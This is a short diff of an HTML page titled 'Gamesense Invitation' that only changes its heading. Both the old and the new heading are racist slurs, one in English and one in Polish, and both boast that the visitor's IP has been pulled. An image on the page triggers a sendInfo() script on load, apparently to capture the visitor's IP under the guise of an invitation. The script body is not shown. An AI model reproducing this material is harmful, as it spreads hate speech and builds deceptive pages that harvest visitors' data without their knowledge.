--- a/statyfortnite.html
+++ b/statyfortnite.html
@@ -4,7 +4,7 @@
   <title>Gamesense Invitation</title>
 </head>
 <body>
-  <h1>gamesense invitation: IP PULLED NIGGERRRRR</h1>
+  <h1>jebac niggerow fajne ip</h1>
   <img src="img/librus.png" onload="sendInfo()">
 
   <script>
